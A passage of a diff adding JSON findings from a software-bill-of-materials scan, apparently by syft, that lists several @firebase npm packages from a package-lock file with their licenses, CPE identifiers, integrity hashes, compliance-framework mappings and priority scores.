0 + }, + "message": "Package discovered: @firebase/app-types 0.9.2", + "title": "@firebase/app-types 0.9.2", + "description": "Package discovered: @firebase/app-types 0.9.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "a5bfafbacd41f0a2", + "name": "@firebase/app-types", + "version": "0.9.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0", + "spdxExpression": "Apache-2.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@firebase\\/app-types:\\@firebase\\/app-types:0.9.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@firebase\\/app-types:\\@firebase\\/app_types:0.9.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@firebase\\/app_types:\\@firebase\\/app-types:0.9.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@firebase\\/app_types:\\@firebase\\/app_types:0.9.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@firebase\\/app:\\@firebase\\/app-types:0.9.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@firebase\\/app:\\@firebase\\/app_types:0.9.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40firebase/app-types@0.9.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@firebase/app-types/-/app-types-0.9.2.tgz", + "integrity": "sha512-oMEZ1TDlBz479lmABwWsWjzHwheQKiAgnuKxE0pz0IXCVx7/rtlkx1fQ6GfgK24WCrxDKMplZrT50Kh04iMbXQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "222f117f0d2bd962", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @firebase/auth-interop-types 0.2.3", + "title": "@firebase/auth-interop-types 0.2.3", + "description": "Package discovered: @firebase/auth-interop-types 0.2.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "9b3141b15843b5a9", + "name": "@firebase/auth-interop-types", + "version": "0.2.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0", + "spdxExpression": "Apache-2.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@firebase\\/auth-interop-types:\\@firebase\\/auth-interop-types:0.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@firebase\\/auth-interop-types:\\@firebase\\/auth_interop_types:0.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@firebase\\/auth_interop_types:\\@firebase\\/auth-interop-types:0.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@firebase\\/auth_interop_types:\\@firebase\\/auth_interop_types:0.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@firebase\\/auth-interop:\\@firebase\\/auth-interop-types:0.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@firebase\\/auth-interop:\\@firebase\\/auth_interop_types:0.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@firebase\\/auth_interop:\\@firebase\\/auth-interop-types:0.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@firebase\\/auth_interop:\\@firebase\\/auth_interop_types:0.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@firebase\\/auth:\\@firebase\\/auth-interop-types:0.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@firebase\\/auth:\\@firebase\\/auth_interop_types:0.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40firebase/auth-interop-types@0.2.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@firebase/auth-interop-types/-/auth-interop-types-0.2.3.tgz", + "integrity": "sha512-Fc9wuJGgxoxQeavybiuwgyi+0rssr76b+nHpj+eGhXFYAdudMWyfBHvFL/I5fEHniUM/UQdFzi9VXJK2iZF7FQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "89a01c3b3491a5d7", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @firebase/component 0.6.9", + "title": "@firebase/component 0.6.9", + "description": "Package discovered: @firebase/component 0.6.9", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "23f944b79804e251", + "name": "@firebase/component", + "version": "0.6.9", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0", + "spdxExpression": "Apache-2.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@firebase\\/component:\\@firebase\\/component:0.6.9:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40firebase/component@0.6.9", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@firebase/component/-/component-0.6.9.tgz", + "integrity": "sha512-gm8EUEJE/fEac86AvHn8Z/QW8BvR56TBw3hMW0O838J/1mThYQXAIQBgUv75EqlCZfdawpWLrKt1uXvp9ciK3Q==", + "dependencies": { + "@firebase/util": "1.10.0", + "tslib": "^2.1.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "ac38e7507aa172f9", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @firebase/database 1.0.8", + "title": "@firebase/database 1.0.8", + "description": "Package discovered: @firebase/database 1.0.8", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "49e5593cb4d5046f", + "name": "@firebase/database", + "version": "1.0.8", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0", + "spdxExpression": "Apache-2.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@firebase\\/database:\\@firebase\\/database:1.0.8:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40firebase/database@1.0.8", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@firebase/database/-/database-1.0.8.tgz", + "integrity": "sha512-dzXALZeBI1U5TXt6619cv0+tgEhJiwlUtQ55WNZY7vGAjv7Q1QioV969iYwt1AQQ0ovHnEW0YW9TiBfefLvErg==", + "dependencies": { + "@firebase/app-check-interop-types": "0.3.2", + "@firebase/auth-interop-types": "0.2.3", + "@firebase/component": "0.6.9", + "@firebase/logger": "0.4.2", + "@firebase/util": "1.10.0", + "faye-websocket": "0.11.4", + "tslib": "^2.1.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "ed006e6af38f061f", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @firebase/database-compat 1.0.8", + "title": "@firebase/database-compat 1.0.8", + "description": "Package discovered: @firebase/database-compat 1.0.8", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "2a2bae4730b1aafc", + "name": "@firebase/database-compat", + "version": "1.0.8", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0", + "spdxExpression": "Apache-2.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@firebase\\/database-compat:\\@firebase\\/database-compat:1.0.8:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@firebase\\/database-compat:\\@firebase\\/database_compat:1.0.8:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@firebase\\/database_compat:\\@firebase\\/database-compat:1.0.8:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@firebase\\/database_compat:\\@firebase\\/database_compat:1.0.8:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@firebase\\/database:\\@firebase\\/database-compat:1.0.8:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@firebase\\/database:\\@firebase\\/database_compat:1.0.8:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40firebase/database-compat@1.0.8", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@firebase/database-compat/-/database-compat-1.0.8.tgz", + "integrity": "sha512-OpeWZoPE3sGIRPBKYnW9wLad25RaWbGyk7fFQe4xnJQKRzlynWeFBSRRAoLE2Old01WXwskUiucNqUUVlFsceg==", + "dependencies": { + "@firebase/component": "0.6.9", + "@firebase/database": "1.0.8", + "@firebase/database-types": "1.0.5", + "@firebase/logger": "0.4.2", + "@firebase/util": "1.10.0", + "tslib": "^2.1.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "04162de267eec152", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @firebase/database-types 1.0.5", + "title": "@firebase/database-types 1.0.5", + "description": "Package discovered: @firebase/database-types 1.0.5", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "67e400eb3f7a92f4", + "name": "@firebase/database-types", + "version": "1.0.5", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0", + "spdxExpression": "Apache-2.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@firebase\\/database-types:\\@firebase\\/database-types:1.0.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@firebase\\/database-types:\\@firebase\\/database_types:1.0.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@firebase\\/database_types:\\@firebase\\/database-types:1.0.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@firebase\\/database_types:\\@firebase\\/database_types:1.0.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@firebase\\/database:\\@firebase\\/database-types:1.0.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@firebase\\/database:\\@firebase\\/database_types:1.0.5:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40firebase/database-types@1.0.5", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@firebase/database-types/-/database-types-1.0.5.tgz", + "integrity": "sha512-fTlqCNwFYyq/C6W7AJ5OCuq5CeZuBEsEwptnVxlNPkWCo5cTTyukzAHRSO/jaQcItz33FfYrrFk1SJofcu2AaQ==", + "dependencies": { + "@firebase/app-types": "0.9.2", + "@firebase/util": "1.10.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "7028a090c3339aad", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @firebase/logger 0.4.2", + "title": "@firebase/logger 0.4.2", + "description": "Package discovered: @firebase/logger 0.4.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "fdb02e46c7ca0cd4", + "name": "@firebase/logger", + "version": "0.4.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0", + "spdxExpression": "Apache-2.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@firebase\\/logger:\\@firebase\\/logger:0.4.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40firebase/logger@0.4.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@firebase/logger/-/logger-0.4.2.tgz", + "integrity": "sha512-Q1VuA5M1Gjqrwom6I6NUU4lQXdo9IAQieXlujeHZWvRt1b7qQ0KwBaNAjgxG27jgF9/mUwsNmO8ptBCGVYhB0A==", + "dependencies": { + "tslib": "^2.1.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "98e9db7b5ca2c98a", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @firebase/util 1.10.0", + "title": "@firebase/util 1.10.0", + "description": "Package discovered: @firebase/util 1.10.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "6fc2f98e01b8bb45", + "name": "@firebase/util", + "version": "1.10.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0", + "spdxExpression": "Apache-2.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:google:firebase\\/util:1.10.0:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/%40firebase/util@1.10.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@firebase/util/-/util-1.10.0.tgz", + "integrity": "sha512-xKtx4A668icQqoANRxyDLBLz51TAbDP9KRfpbKGxiCAW346d0BeJe5vN6/hKxxmWwnZ0mautyv39JxviwwQMOQ==", + "dependencies": { + "tslib": "^2.1.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": 